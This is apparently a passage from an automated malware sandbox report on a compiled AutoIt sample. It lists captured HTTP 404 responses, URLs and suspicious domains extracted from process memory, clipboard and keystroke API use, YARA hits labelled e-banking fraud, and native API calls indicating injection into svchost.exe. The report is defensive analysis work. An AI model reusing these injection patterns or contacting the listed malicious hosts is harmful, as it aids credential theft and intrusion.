Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: global traffic; HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 04:40:40 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: global traffic; HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 04:40:42 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html; charset=utf-8
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3365143129.0000000002831000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shopphere.store
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3365143129.0000000002831000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shopphere.store/bq63/
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://api.forms.ladipage.com/
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fburl.com
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://la.ladipage.com/
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: RMActivate_ssp_isv.exe, 00000006.00000003.2813174414.000000000798D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://optimize.google.com
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://td.doubleclick.net
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://w.ladicdn.com/
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3367593533.0000000005F60000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://w.ladicdn.com/v2/source/html5shiv.min.js?v=1569310222693
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3367593533.0000000005F60000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://w.ladicdn.com/v2/source/respond.min.js?v=1569310222693
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googleanalytics.com
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googleoptimize.com
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.0000000005FA4000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.00000000038B4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2922696805.000000001FE94000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=68383/jq20/
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.0000000005FA4000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.00000000038B4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2922696805.000000001FE94000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=68383/jq20/
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004A4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_004A4164
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004A3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_004A3F66
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0049001C
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004BCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_004BCABC

                E-Banking Fraud

                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2644936328.0000000007FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3365143129.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2622644598.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3359125714.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3365172560.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3365128938.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3365692561.0000000002A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2625771616.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: This is a third-party compiled AutoIt script.0_2_00433B3A
                Source: BLv4mI7zzY.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: BLv4mI7zzY.exe, 00000000.00000000.2115642457.00000000004E4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_effd5d0b-7
                Source: BLv4mI7zzY.exe, 00000000.00000000.2115642457.00000000004E4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_df15a08c-d
                Source: BLv4mI7zzY.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_57416e4c-7
                Source: BLv4mI7zzY.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_d017aa82-7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C5A3 NtClose,2_2_0042C5A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B60 NtClose,LdrInitializeThunk,2_2_03772B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03772DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037735C0 NtCreateMutant,LdrInitializeThunk,2_2_037735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774340 NtSetContextThread,2_2_03774340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774650 NtSuspendThread,2_2_03774650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BF0 NtAllocateVirtualMemory,2_2_03772BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BE0 NtQueryValueKey,2_2_03772BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BA0 NtEnumerateValueKey,2_2_03772BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B80 NtQueryInformationFile,2_2_03772B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AF0 NtWriteFile,2_2_03772AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AD0 NtReadFile,2_2_03772AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AB0 NtWaitForSingleObject,2_2_03772AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F60 NtCreateProcessEx,2_2_03772F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F30 NtCreateSection,2_2_03772F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FE0 NtCreateFile,2_2_03772FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FB0 NtResumeThread,2_2_03772FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FA0 NtQuerySection,2_2_03772FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F90 NtProtectVirtualMemory,2_2_03772F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E30 NtWriteVirtualMemory,2_2_03772E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EE0 NtQueueApcThread,2_2_03772EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EA0 NtAdjustPrivilegesToken,2_2_03772EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E80 NtReadVirtualMemory,2_2_03772E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D30 NtUnmapViewOfSection,2_2_03772D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D10 NtMapViewOfSection,2_2_03772D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D00 NtSetInformationFile,2_2_03772D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DD0 NtDelayExecution,2_2_03772DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DB0 NtEnumerateKey,2_2_03772DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C70 NtFreeVirtualMemory,2_2_03772C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C60 NtCreateKey,2_2_03772C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C00 NtQueryInformationProcess,2_2_03772C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CF0 NtOpenProcess,2_2_03772CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CC0 NtQueryVirtualMemory,2_2_03772CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CA0 NtQueryInformationToken,2_2_03772CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773010 NtOpenDirectoryObject,2_2_03773010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773090 NtSetValueKey,2_2_03773090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037739B0 NtGetContextThread,2_2_037739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D70 NtOpenThread,2_2_03773D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D10 NtOpenProcessToken,2_2_03773D10
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F14340 NtSetContextThread,LdrInitializeThunk,6_2_02F14340
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F14650 NtSuspendThread,LdrInitializeThunk,6_2_02F14650
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12AF0 NtWriteFile,LdrInitializeThunk,6_2_02F12AF0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12AD0 NtReadFile,LdrInitializeThunk,6_2_02F12AD0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_02F12BF0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12BE0 NtQueryValueKey,LdrInitializeThunk,6_2_02F12BE0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_02F12BA0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12B60 NtClose,LdrInitializeThunk,6_2_02F12B60
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12EE0 NtQueueApcThread,LdrInitializeThunk,6_2_02F12EE0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_02F12E80
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12FE0 NtCreateFile,LdrInitializeThunk,6_2_02F12FE0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12FB0 NtResumeThread,LdrInitializeThunk,6_2_02F12FB0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12F30 NtCreateSection,LdrInitializeThunk,6_2_02F12F30
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_02F12CA0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_02F12C70
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12C60 NtCreateKey,LdrInitializeThunk,6_2_02F12C60
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_02F12DF0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12DD0 NtDelayExecution,LdrInitializeThunk,6_2_02F12DD0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_02F12D30
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12D10 NtMapViewOfSection,LdrInitializeThunk,6_2_02F12D10
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F135C0 NtCreateMutant,LdrInitializeThunk,6_2_02F135C0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F139B0 NtGetContextThread,LdrInitializeThunk,6_2_02F139B0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12AB0 NtWaitForSingleObject,6_2_02F12AB0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12B80 NtQueryInformationFile,6_2_02F12B80
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12EA0 NtAdjustPrivilegesToken,6_2_02F12EA0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12E30 NtWriteVirtualMemory,6_2_02F12E30
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12FA0 NtQuerySection,6_2_02F12FA0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12F90 NtProtectVirtualMemory,6_2_02F12F90
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12F60 NtCreateProcessEx,6_2_02F12F60
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12CF0 NtOpenProcess,6_2_02F12CF0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12CC0 NtQueryVirtualMemory,6_2_02F12CC0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12C00 NtQueryInformationProcess,6_2_02F12C00
